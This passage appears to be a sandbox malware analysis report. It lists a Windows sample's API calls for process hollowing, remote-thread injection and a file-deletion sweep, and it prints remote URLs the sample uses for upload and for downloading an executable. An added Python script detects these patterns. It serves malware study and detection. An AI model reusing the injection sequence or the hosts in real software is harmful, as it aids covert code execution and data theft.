                                                                            • API ID: CreateThreadUser
                                                                            • String ID:
                                                                            • API String ID: 1531140918-0
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000044,00000000), ref: 007D450D
                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 007D4525
                                                                            • GetProcAddress.KERNEL32(?,NtCreateSection), ref: 007D4537
                                                                            • GetProcAddress.KERNEL32(?,NtMapViewOfSection), ref: 007D454C
                                                                            • GetProcAddress.KERNEL32(?,RtlCreateUserThread), ref: 007D4561
                                                                            • GetProcAddress.KERNEL32(?,NtUnmapViewOfSection), ref: 007D4573
                                                                            • GetProcAddress.KERNEL32(?,NtClose), ref: 007D4585
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D4591
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,0000091C,00000004,08000000,00000000), ref: 007D463B
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 007D4682
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D4690
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,0000091C,00000002,00000000,00000004), ref: 007D46D8
                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 007D473B
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D4784
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D4792
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D47DA
                                                                            • _memmove.LIBCMT ref: 007D4806
                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 007D481F
                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 007D4837
                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 007D4851
                                                                            • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 007D486F
                                                                            • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 007D4886
                                                                            • lstrcpyA.KERNEL32(?,Sleep), ref: 007D489E
                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 007D48B6
                                                                            • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 007D48CD
                                                                            • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 007D48E5
                                                                            • lstrcpyA.KERNEL32(?,LocalFree), ref: 007D48FD
                                                                            • lstrcpyA.KERNEL32(?,CloseHandle), ref: 007D4914
                                                                            • lstrcpyA.KERNEL32(?,VirtualFree), ref: 007D492C
                                                                            • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 007D4944
                                                                            • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 007D495B
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007D4997
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D49DD
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D49EB
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D4A33
                                                                            • _memmove.LIBCMT ref: 007D4A5B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,007C55B9), ref: 007D4A98
                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D4AE0
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000BB8), ref: 007D4B1F
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007D4B46
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007D4B57
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007D4B68
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4B79
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4B8A
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4B9B
                                                                            • NtClose.NTDLL(00000000), ref: 007D4BA8
                                                                            • NtClose.NTDLL(00000000), ref: 007D4BB5
                                                                            • NtClose.NTDLL(00000000), ref: 007D4BC2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4BCF
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4BE7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4BF1
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4BFB
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4C1D
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4C2E
                                                                            • NtClose.NTDLL(00000000), ref: 007D4C3B
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4C4C
                                                                            • NtClose.NTDLL(00000000), ref: 007D4C59
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4C6A
                                                                            • NtClose.NTDLL(00000000), ref: 007D4C77
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4C89
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4C93
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4C9D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate_memmove$EventLibraryLoadModuleObjectSingleThreadUserWait
                                                                            • String ID: CloseHandle$D$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                                                                            • API String ID: 4191060109-4063295011
                                                                            APIs
                                                                            • OpenEventW.KERNEL32(00100000,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007E1042
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{C3397568-8840-4085-8F6E-BC07C085BB3B}), ref: 007E1071
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E10EA
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E1149
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Strings
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 007E1065
                                                                            • {50EF1399-6492-458E-896D-12BB129EB697}, xrefs: 007E10A1
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007E1036
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                                                                            • String ID: {50EF1399-6492-458E-896D-12BB129EB697}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${C3397568-8840-4085-8F6E-BC07C085BB3B}
                                                                            • API String ID: 385723476-3953213537
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000B3C), ref: 007C5150
                                                                            • lstrcpyW.KERNEL32(00000000,{08A9BF59-0E77-41C8-B553-94F53303F0D5}), ref: 007C5179
                                                                            • lstrcpyW.KERNEL32(-0000009C,{C3397568-8840-4085-8F6E-BC07C085BB3B}), ref: 007C5191
                                                                            • lstrcpyW.KERNEL32(-000000EA,{F8334C8B-EA9E-45F9-ADFE-BAE309D22900}), ref: 007C51A9
                                                                            • lstrcpyW.KERNEL32(-00000138,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0), ref: 007C51BF
                                                                            • lstrcpyW.KERNEL32(-000005EA,00836BDC), ref: 007C51D7
                                                                            • lstrcpyW.KERNEL32(-000006B2,https://woo097878781.win/upload.php), ref: 007C51EF
                                                                            • lstrcpyW.KERNEL32(-0000090A,{77F3A004-6E1A-45B6-91BA-6F11612691D9}), ref: 007C5205
                                                                            • _memset.LIBCMT ref: 007C5302
                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000010,4000000C,00000000,00000000), ref: 007C5328
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56DD
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C56F2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5702
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C5712
                                                                            Strings
                                                                            • {F8334C8B-EA9E-45F9-ADFE-BAE309D22900}, xrefs: 007C5197, 007C558D
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 007C517F
                                                                            • {77F3A004-6E1A-45B6-91BA-6F11612691D9}, xrefs: 007C51F5
                                                                            • HWID_%s, xrefs: 007C5388
                                                                            • %s %s, xrefs: 007C5574
                                                                            • https://woo097878781.win/32.EXE, xrefs: 007C543B
                                                                            • https://woo097878781.win/upload.php, xrefs: 007C51DD
                                                                            • {08A9BF59-0E77-41C8-B553-94F53303F0D5}, xrefs: 007C516E
                                                                            • {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}, xrefs: 007C5568
                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 007C51AF, 007C542A
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$Local$CloseFreeHandle$AllocBinaryCryptString_memset
                                                                            • String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/32.EXE$https://woo097878781.win/upload.php${08A9BF59-0E77-41C8-B553-94F53303F0D5}${77F3A004-6E1A-45B6-91BA-6F11612691D9}${C3397568-8840-4085-8F6E-BC07C085BB3B}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${F8334C8B-EA9E-45F9-ADFE-BAE309D22900}
                                                                            • API String ID: 2754469768-1176139285
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DC7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6DF9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6E17
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6E4C
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6E8C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6EA5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6EAF
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007D6EF9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F31
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6F63
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6F81
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0000E020,-00839F18,00000004,00000000), ref: 007D6FB5
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D6FF5
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D70B8
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007D716A
                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 007D7187
                                                                            • closesocket.WS2_32(?), ref: 007D7193
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CreateThread$EventResumesetsockopt$InfoLocaleObjectSingleWait___crtclosesocket
                                                                            • String ID: d
                                                                            • API String ID: 404341171-2564639436
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E15F6
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E163E
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1678
                                                                            • WaitForMultipleObjects.KERNEL32(00000006,?,00000000,000000FF), ref: 007E18CE
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E1BD7
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D0F
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D23
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1D52
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1D7D
                                                                            • closesocket.WS2_32(00000000), ref: 007E1D8A
                                                                            • LocalFree.KERNEL32(?), ref: 007E1D9E
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID:
                                                                            • API String ID: 3117981272-0
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 007CA1B9
                                                                            • _memset.LIBCMT ref: 007CA1CA
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,007C2000), ref: 007CA21B
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007CA251
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007CA285
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007CA290
                                                                            • _memmove.LIBCMT ref: 007CA2AF
                                                                            • NtMapViewOfSection.NTDLL(00000000,007C2000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007CA2DA
                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 007CA320
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007CA360
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007CA36E
                                                                            • _memmove.LIBCMT ref: 007CA390
                                                                            • NtMapViewOfSection.NTDLL(00000000,007C2000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007CA3C7
                                                                            • _memset.LIBCMT ref: 007CA3E8
                                                                            • GetThreadContext.KERNEL32(?,00010007), ref: 007CA405
                                                                            • WriteProcessMemory.KERNEL32(007C2000,?,?,00000004,?), ref: 007CA447
                                                                            • SetThreadContext.KERNEL32(?,00010007), ref: 007CA461
                                                                            • ResumeThread.KERNEL32(?), ref: 007CA470
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA486
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA494
                                                                            • NtClose.NTDLL(00000000), ref: 007CA49E
                                                                            • NtClose.NTDLL(00000000), ref: 007CA4AB
                                                                            • NtUnmapViewOfSection.NTDLL(007C2000,00000000), ref: 007CA4E6
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA4F7
                                                                            • NtClose.NTDLL(00000000), ref: 007CA504
                                                                            • NtUnmapViewOfSection.NTDLL(007C2000,00000000), ref: 007CA512
                                                                            • NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 007CA520
                                                                            • NtClose.NTDLL(00000000), ref: 007CA52A
                                                                            • CloseHandle.KERNEL32(007C2000), ref: 007CA534
                                                                            • CloseHandle.KERNEL32(?), ref: 007CA53E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle_memmove_memset$MemoryResumeWrite
                                                                            • String ID: D
                                                                            • API String ID: 987980044-2746444292
                                                                            • Opcode ID: 0910b5a9ee691f5e64ef34142217752d6c5021692d9ea6f3cda5bba7375743bf
                                                                            • Instruction ID: 1a078f370e19f0c9c7e1bc804c02f6a1a15063ca90874629d73bd8f686f21e18
                                                                            • Opcode Fuzzy Hash: 0910b5a9ee691f5e64ef34142217752d6c5021692d9ea6f3cda5bba7375743bf
                                                                            • Instruction Fuzzy Hash: F1C1EAB1A00218AFDB24CFA4DD49F9EB7B9BB48704F208558F609EB290D775AA41CF51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$__snwprintf_memset$FindSleep$AttributesDirectoryRemove$CloseDeleteFirstFolderFreeKnownNextPathTasklstrlen
                                                                            • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                                                                            • API String ID: 1835786642-2457321626
                                                                            • Opcode ID: 47b4ecd0ac02d1e8d0b94436ba1760dcc4909d25f7c5bd5189d4c695910d3870
                                                                            • Instruction ID: d1289f10edd8e11d4308d710c80794259684486f28fc6fc9c7eaabbe70522ea4
                                                                            • Opcode Fuzzy Hash: 47b4ecd0ac02d1e8d0b94436ba1760dcc4909d25f7c5bd5189d4c695910d3870
                                                                            • Instruction Fuzzy Hash: C761B5B1D002189BEB24DB60DC89FE97775BB84300F0085E9F615A7280EB798F94DF61
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007DCAA5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DCABD
                                                                            • wnsprintfW.SHLWAPI ref: 007DCAE2
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DCAF2
                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 007DCB10
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007DCB2F
                                                                            • lstrcmpW.KERNEL32(?,007F7444), ref: 007DCB4D
                                                                            • lstrcmpW.KERNEL32(?,007F7448), ref: 007DCB63
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DCB88
                                                                            • wnsprintfW.SHLWAPI ref: 007DCBB9
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 007DCBE4
                                                                            • GetLastError.KERNEL32 ref: 007DCBF6
                                                                            • LocalFree.KERNEL32(?), ref: 007DCC08
                                                                            • wnsprintfW.SHLWAPI ref: 007DCC29
                                                                            • DeleteFileW.KERNEL32(00000000), ref: 007DCC36
                                                                            • FindNextFileW.KERNEL32(000000FF,?), ref: 007DCC47
                                                                            • FindClose.KERNEL32(000000FF), ref: 007DCC59
                                                                            • GetLastError.KERNEL32 ref: 007DCC69
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCC78
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCC82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$AllocFileFindFreewnsprintf$ErrorLastObjectSingleWaitlstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                            • String ID: %s%s$%s%s\$%s*.*
                                                                            • API String ID: 3901725581-784047915
                                                                            • Opcode ID: 3f1161a65b513d2abd1813dfbe57bd7b2172c47cdc255603fcd5bbd4a57aa2c2
                                                                            • Instruction ID: 60e046ba12fedd552d00229ca568cf848964ce3ea8f2c88a0fbf8e535b4bbca8
                                                                            • Opcode Fuzzy Hash: 3f1161a65b513d2abd1813dfbe57bd7b2172c47cdc255603fcd5bbd4a57aa2c2
                                                                            • Instruction Fuzzy Hash: 9F517FB1A0420AEBDB15EFA4DC4DFBA7779BF48301F008599F609A7291DB389941CF64
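The two API lists above are worth reading as behaviour rather than as a flat call log. The first (the function at 007CA1B9 onward) is a section-mapping injection chain: CreateProcessW is called with dwCreationFlags 0x00000004 (CREATE_SUSPENDED), NtCreateSection is called with page protection 0x40 (PAGE_EXECUTE_READWRITE) and allocation attributes 0x08000000 (SEC_COMMIT), each section is mapped twice with NtMapViewOfSection (once locally so _memmove can fill it, once into the child), and GetThreadContext/WriteProcessMemory/SetThreadContext/ResumeThread redirect the suspended primary thread before the local views are unmapped. The second (the function at 007DCAA5 onward) is a FindFirstFileW/FindNextFileW loop that calls DeleteFileW and RemoveDirectoryW on everything it enumerates under a "%s*.*" pattern, the shape of a self-cleanup routine. The following Python is an added triage example and is not part of the Joe Sandbox report or of its IDA plugin output: it parses bullets in the exact format shown on this page and applies both rules. It assumes, as a heuristic, that the values in parentheses are positional arguments matching the public prototypes (Joe Sandbox prints a stack snapshot, and "?" marks an unresolved value), so the checks are indicators to confirm in the dump, not proof. The two malicious traces are transcribed subsets of the lists above; the benign control trace is constructed.

```python
"""Triage a Joe Sandbox 'APIs' listing for the section-mapping hollowing chain
and the recursive delete sweep shown in this report (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

CREATE_SUSPENDED = 0x00000004   # CreateProcessW dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x40   # NtCreateSection SectionPageProtection
SEC_COMMIT = 0x08000000         # NtCreateSection AllocationAttributes

# One report bullet: "• NtClose.NTDLL(00000000), ref: 007CA49E" or,
# without arguments, "• _memmove.LIBCMT ref: 007CA2AF".
API_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # int per argument; None for '?' or a string literal

def _parse_arg(tok: str) -> Optional[int]:
    try:
        return int(tok.strip(), 16)
    except ValueError:
        return None  # '?' (unresolved) or a literal such as NTDLL.DLL

def parse_api_listing(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = [_parse_arg(t) for t in raw.split(",")] if raw else []
            calls.append(ApiCall(m.group("name"), m.group("module"), args))
    return calls

def _arg(call: ApiCall, idx: int) -> Optional[int]:
    return call.args[idx] if idx < len(call.args) else None

def _in_order(names: list[str], *wanted: str) -> bool:
    # True when every name in `wanted` occurs, in that relative order
    pos = 0
    for w in wanted:
        if w not in names[pos:]:
            return False
        pos = names.index(w, pos) + 1
    return True

def hollowing_indicators(calls: list[ApiCall]) -> dict[str, bool]:
    """Assumes listed values are positional arguments of the public prototypes:
    CreateProcessW[5] = dwCreationFlags, NtCreateSection[4] = page protection,
    NtCreateSection[5] = allocation attributes (heuristic, see lead-in)."""
    names = [c.name for c in calls]
    return {
        "suspended_child": any(
            c.name == "CreateProcessW" and bool((_arg(c, 5) or 0) & CREATE_SUSPENDED)
            for c in calls),
        "rwx_committed_section": any(
            c.name == "NtCreateSection" and _arg(c, 4) == PAGE_EXECUTE_READWRITE
            and _arg(c, 5) == SEC_COMMIT for c in calls),
        # one section mapped twice: locally to fill it, then into the target
        "section_mapped_twice": names.count("NtMapViewOfSection") >= 2,
        # thread context rewritten before the suspended primary thread runs
        "context_then_resume": _in_order(names, "CreateProcessW",
            "NtMapViewOfSection", "SetThreadContext", "ResumeThread"),
    }

def is_process_hollowing(calls: list[ApiCall]) -> bool:
    return all(hollowing_indicators(calls).values())

def is_delete_sweep(calls: list[ApiCall]) -> bool:
    """FindFirstFileW loop that deletes files and directories: a cleanup sweep."""
    names = [c.name for c in calls]
    return (_in_order(names, "FindFirstFileW", "DeleteFileW",
                      "FindNextFileW", "FindClose")
            and "RemoveDirectoryW" in names)

# Transcribed (subset) from the report's hollowing APIs list above.
HOLLOWING_LISTING = """
• CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,007C2000), ref: 007CA21B
• NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 007CA320
• NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007CA36E
• NtMapViewOfSection.NTDLL(00000000,007C2000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007CA3C7
• WriteProcessMemory.KERNEL32(007C2000,?,?,00000004,?), ref: 007CA447
• SetThreadContext.KERNEL32(?,00010007), ref: 007CA461
• ResumeThread.KERNEL32(?), ref: 007CA470
"""
# Transcribed (subset) from the directory-walk APIs list above.
SWEEP_LISTING = """
• FindFirstFileW.KERNEL32(00000000,?), ref: 007DCB10
• RemoveDirectoryW.KERNEL32(?), ref: 007DCBE4
• DeleteFileW.KERNEL32(00000000), ref: 007DCC36
• FindNextFileW.KERNEL32(000000FF,?), ref: 007DCC47
• FindClose.KERNEL32(000000FF), ref: 007DCC59
"""
# Constructed control trace: plain child launch, no suspend flag, no mapping.
BENIGN_LISTING = """
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401000
• CloseHandle.KERNEL32(?), ref: 00401030
"""
```

Run `is_process_hollowing(parse_api_listing(HOLLOWING_LISTING))` and `is_delete_sweep(parse_api_listing(SWEEP_LISTING))` to see both rules fire, and the benign trace to see neither fire. The ordering check matters more than the individual calls: a legitimate loader may create a suspended child or map a section, but rewriting the thread context of a freshly suspended child after mapping an RWX section into it is the hollowing shape, and a file-enumeration loop that both deletes files and removes directories is the cleanup shape. Confirm each hit in the memory dump (the remote NtMapViewOfSection target and the written context) before treating it as more than an indicator.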
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DFA18
                                                                            • und_memcpy.LIBCMTD ref: 007DFA3D
